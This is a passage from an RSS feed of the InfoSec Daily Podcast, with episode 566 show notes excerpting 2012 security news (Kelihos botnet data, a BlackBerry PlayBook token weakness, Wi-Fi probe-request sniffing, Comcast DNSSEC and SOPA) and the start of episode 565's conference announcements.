<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data includes IP addresses of Kelihos infected systems complemented by other data such as the AS (autonomous system) number and reputation data provided by Microsoft&#39;s Smart Data Network Services (SNDS). Personally identifiable informaiton (PII) would not be part of the threat feed, Campana said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft collects the data by leveraging its huge Internet infrastructure, including a load-balanced, 80gb/second global network, to swallow botnets whole &#8211; pointing botnet infected hosts to addresses that Microsoft controls, capturing their activity and effectively taking them offline.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://threatpost.com/en_us/blogs/researchers-find-way-sniff-corporate-email-blackberry-playbook-011212"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/researchers-find-way-sniff-corporate-email-blackberry-playbook-011212</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers and attackers have had no shortage of mobile platforms and devices to sink their teeth into in recent years, thanks to the explosion of iOS and Android phones and tablets in the consumer and enterprise markets. Now, the spotlight is slowly beginning to turn in the direction of RIM, and specifically its BlackBerry PlayBook tablet.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first dings in the PlayBook&#39;s armor came last month when a group of researchers published a tool that could jailbreak PlayBook tablets through the exploitation of a bug they&#39;d discovered in the operating system. RIM later issued a fix for the jailbreak, but that was just the start of what may end up being a long road for the company&#39;s security efforts.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest indication is work done by a pair of researchers who found a series of problems and weaknesses in PlayBook, including one that enables an attacker to listen in on the connection between the tablet and a BlackBerry handset. That connection, which is done via Bluetooth in the company&#39;s Bridge application, is designed to allow users to access their corporate email, calendar and other data on the tablet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers Zach Lanier and Ben Nell of Intrepidus Group were able to locate and grab the authentication token sent between the two devices during Bridge connections and, as an unprivileged user, connect to the PlayBook and access the user&#39;s email and other sensitive information. The key to their finding, which they discussed in a talk at the Infiltrate conference here Thursday, is the fact that the PlayBook&#39;s OS puts the authentication token for the Bridge sessions in a spot that is readable by anyone who knows how to find it.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/</span></a></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All devices have Wi-Fi interfaces (laptops, tablets, mobile phones, consoles, etc) and their operating systems have features to easily manage the wireless networks you connect them to. When you connect for a first time to a new network, most users save the informations for later use (or the system stores it for you without notification). This small database will be used later by the operating system to discover which known network(s) is(are) available and automatically connect to them.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This database may contains a lot of interesting data. Some may reveal private information like your employer, your ISP, where you go to party, to eat, where you go on holidays or which security conference you attended. Why? Simply because networks are often configured with explicit names</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">By default, when a new wireless network is configured, the flag &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto-connect</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; is enabled. This is the case on Ubuntu, MacOS and Windows 7. What does this mean? Each time you boot your computer or you reconfigure your Wireless card, the device will sent &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Request</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; management frame over the air. This can be compared to a message like &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hey! Network xxx are you there?</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;. Even if your network uses encryption, all those probes are sent in clear! In Wi-Fi technologies, they are several methods available to detect the available networks or SSIDs:</span></div>
<ul>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Beacon,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Requests,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Responses,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Association Requests,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reassociation Requests</span></li>
</ul>
<p>
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Requests</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; are very interesting to be captured to detect the SSID&rsquo;s already configured and used by people. To achieve this, we just need a</span><a href="http://www.backtrack-linux.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> BackTrack 5</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a Wi-Fi network card that supports</span><a href="http://blog.rootshell.be/2010/08/09/backtrack4-r1-awus036nh-win/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">monitoring</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> mode and some tools.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The script is available</span><a href="https://github.com/xme/hoover"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;..</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://venturebeat.com/2012/01/12/comcast-sopa/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://venturebeat.com/2012/01/12/comcast-sopa/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cable TV and internet service provider Comcast recently rolled out an upgrade to its entire internet service network that prevents DNS blocking. DNS blocking would be necessary to enforce the Stop Online Piracy Act (SOPA) should it pass.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The</span><a href="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DNSSEC</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> technology Comcast has implemented across its network is intended to add an extra layer of security to websites by checking for a special DNS signature to prove that the site is actually what it claims to be, according to a</span><a href="http://www.techdirt.com/articles/20120110/18081517371/comcast-owner-nbc-universal-admits-that-dns-redirects-are-incompatible-with-dnssec.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">TechDirt</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> report.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The humor in all of this is that Comcast is a big supporter of SOPA. But now it&rsquo;s not only made its network incompatible with SOPA, it&rsquo;s also undercut the need for SOPA somewhat by putting in place technology that &nbsp;helps legitimize the identity of websites to improve accountability and security.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://motherboard.vice.com/2012/1/6/hollywood-s-last-stand-the-desperate-plot-behind-the-sopa-opera--2"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://motherboard.vice.com/2012/1/6/hollywood-s-last-stand-the-desperate-plot-behind-the-sopa-opera&#8211;2</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Look back at any period of rapid technological progress and you&rsquo;ll find two groups of individuals: Pioneers tirelessly charting new territory for the benefit of the species and members of the old order standing against the tide to fight back the phantom of their own perceived obsolescence. The debate over the Stop Online Piracy Act boils down to exactly this &mdash; a desperate last-ditch effort by the reigning Hollywood and recording industry elite to preserve their crumbling empires, no matter the cost to free speech, innovation and security.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s not the first time this has happened, and it certainly won&rsquo;t be the last. Jump back a hundred or so years to one example famously cited by</span><a href="http://motherboard.vice.com/2011/11/22/in-the-net-censorship-copyfight-lessig-strikes-at-the-root"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">copyright law professor Lawrence Lessig</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, in which American march composer John Philip Sousa speaks out against a machine called the gramophone that played recorded music without the need of live musicians.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;When I was a boy&hellip;in front of every house in the summer evenings, you would find young people together singing the songs of the day or old songs,&rdquo; Sousa said at a Congressional hearing in 1906. &ldquo;Today you hear these infernal machines going night and day. We will not have a vocal cord left. The vocal cord will be eliminated by a process of evolution, as was the tail of man when he came from the ape.&rdquo; Ironically, he was rallying against the very recording industry that went on to rally against recordable cassette tapes, and is currently rallying against the internet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3365/0/infosec-daily-podcast-episode-566.mp3" length="21816151" type="audio/mpeg" />
		<itunes:duration>0:45:24</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details
Hacktivist group Anonymous has released what it claims to be a series of log-in details for Israeli SCADA systems, in what could be retaliation for Tel Aviv&#39;s hardline reaction to the recent mass credit card hack on thousa[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 565 &#8211; Pentesting Lessons, Casey Anthony, USCC, QR Codes, AnonBomb &amp; Public Code</title>
		<link>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code</link>
		<comments>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code#comments</comments>
		<pubDate>Thu, 12 Jan 2012 01:44:52 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3357</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 565 for January 11, 2012.&nbsp; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
